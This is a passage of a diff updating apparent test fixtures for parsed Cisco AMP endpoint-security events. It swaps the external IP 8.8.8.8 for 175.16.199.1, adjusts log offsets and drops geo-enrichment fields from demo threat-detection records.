-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -130,7 +130,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -142,7 +142,7 @@
         "@timestamp": "2021-01-15T11:20:38.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -183,7 +183,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 12475,
+        "log.offset": 12480,
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
         "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
         "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
@@ -199,7 +199,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -215,7 +215,7 @@
         "@timestamp": "2021-01-15T11:20:06.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -256,7 +256,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 14116,
+        "log.offset": 14126,
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
         "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80",
         "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132",
@@ -272,7 +272,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -288,7 +288,7 @@
         "@timestamp": "2021-01-15T10:45:07.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -328,7 +328,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 15757,
+        "log.offset": 15772,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -339,7 +339,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -351,7 +351,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -371,13 +371,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 978000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -390,7 +383,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 17081,
+        "log.offset": 17101,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -404,8 +397,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -423,7 +416,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -443,13 +436,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 978000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -462,7 +448,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 18534,
+        "log.offset": 18559,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -476,8 +462,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -495,7 +481,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -515,13 +501,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 947000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -534,7 +513,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 19987,
+        "log.offset": 20017,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -548,8 +527,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -567,7 +546,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -587,13 +566,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 931000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -606,7 +578,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 21440,
+        "log.offset": 21475,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -620,8 +592,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -639,7 +611,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -659,13 +631,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 900000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -678,7 +643,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 22893,
+        "log.offset": 22933,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -692,8 +657,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -711,7 +676,7 @@
         "@timestamp": "2021-01-15T10:37:43.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -731,13 +696,6 @@
             "e1:e5:94:ea:a5:44"
         ],
         "cisco.amp.timestamp_nanoseconds": 869000000,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.8.4.4",
         "destination.port": 443,
         "event.action": "DFC Threat Detected",
@@ -750,7 +708,7 @@
         "host.hostname": "Demo_Upatre",
         "host.name": "Demo_Upatre",
         "input.type": "log",
-        "log.offset": 24346,
+        "log.offset": 24391,
         "network.direction": "egress",
         "network.transport": "TCP",
         "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454",
@@ -764,8 +722,8 @@
         "related.ip": [
             "10.10.0.0",
             "10.10.10.10",
-            "8.8.4.4",
-            "8.8.8.8"
+            "175.16.199.1",
+            "8.8.4.4"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -785,7 +743,7 @@
         "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -820,7 +778,7 @@
         "host.hostname": "Demo_Command_Line_Arguments_Meterpreter",
         "host.name": "Demo_Command_Line_Arguments_Meterpreter",
         "input.type": "log",
-        "log.offset": 25799,
+        "log.offset": 25849,
         "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9",
         "related.hash": [
             "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"
@@ -830,7 +788,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -842,7 +800,7 @@
         "@timestamp": "2021-01-15T10:27:39.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -882,7 +840,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 27431,
+        "log.offset": 27486,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -893,7 +851,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -909,7 +867,7 @@
         "@timestamp": "2021-01-15T10:24:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -943,7 +901,7 @@
         "host.hostname": "Demo_TeslaCrypt",
         "host.name": "Demo_TeslaCrypt",
         "input.type": "log",
-        "log.offset": 28756,
+        "log.offset": 28816,
         "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
         "related.hash": [
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
@@ -953,7 +911,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -965,7 +923,7 @@
         "@timestamp": "2021-01-15T10:23:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1005,7 +963,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 30055,
+        "log.offset": 30120,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1016,7 +974,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1032,7 +990,7 @@
         "@timestamp": "2021-01-15T10:23:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1070,7 +1028,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 31381,
+        "log.offset": 31451,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1081,7 +1039,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1097,7 +1055,7 @@
         "@timestamp": "2021-01-15T10:23:01.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1135,7 +1093,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 32700,
+        "log.offset": 32775,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1146,7 +1104,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1162,7 +1120,7 @@
         "@timestamp": "2021-01-15T10:22:29.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1199,7 +1157,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 34019,
+        "log.offset": 34099,
         "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124",
         "related.hash": [
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"
@@ -1209,7 +1167,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1221,7 +1179,7 @@
         "@timestamp": "2021-01-15T10:22:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1261,7 +1219,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 35375,
+        "log.offset": 35460,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1272,7 +1230,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1288,7 +1246,7 @@
         "@timestamp": "2021-01-15T10:22:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1326,7 +1284,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 36701,
+        "log.offset": 36791,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1337,7 +1295,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1353,7 +1311,7 @@
         "@timestamp": "2021-01-15T10:22:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1391,7 +1349,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 38020,
+        "log.offset": 38115,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1402,7 +1360,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1418,7 +1376,7 @@
         "@timestamp": "2021-01-15T10:21:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1458,7 +1416,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 39339,
+        "log.offset": 39439,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1469,7 +1427,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1485,7 +1443,7 @@
         "@timestamp": "2021-01-15T10:21:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1525,7 +1483,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 40665,
+        "log.offset": 40770,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1536,7 +1494,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1552,7 +1510,7 @@
         "@timestamp": "2021-01-15T10:21:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1590,7 +1548,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 41991,
+        "log.offset": 42101,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1601,7 +1559,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1617,7 +1575,7 @@
         "@timestamp": "2021-01-15T10:20:59.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1655,7 +1613,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 43310,
+        "log.offset": 43425,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1666,7 +1624,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1682,7 +1640,7 @@
         "@timestamp": "2021-01-15T10:20:00.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1728,7 +1686,7 @@
         "host.hostname": "Demo_AMP_Exploit_Prevention",
         "host.name": "Demo_AMP_Exploit_Prevention",
         "input.type": "log",
-        "log.offset": 44629,
+        "log.offset": 44749,
         "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894",
         "related.hash": [
             "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"
@@ -1738,7 +1696,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1750,7 +1708,7 @@
         "@timestamp": "2021-01-15T10:19:59.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1790,7 +1748,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 46087,
+        "log.offset": 46212,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1801,7 +1759,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1817,7 +1775,7 @@
         "@timestamp": "2021-01-15T10:19:59.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1855,7 +1813,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 47413,
+        "log.offset": 47543,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1866,7 +1824,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1882,7 +1840,7 @@
         "@timestamp": "2021-01-15T10:19:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1920,7 +1878,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 48732,
+        "log.offset": 48867,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1931,7 +1889,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1947,7 +1905,7 @@
         "@timestamp": "2021-01-15T10:18:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1987,7 +1945,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 50051,
+        "log.offset": 50191,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1998,7 +1956,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2014,7 +1972,7 @@
         "@timestamp": "2021-01-15T10:18:58.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2052,7 +2010,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 51377,
+        "log.offset": 51522,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2063,7 +2021,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2079,7 +2037,7 @@
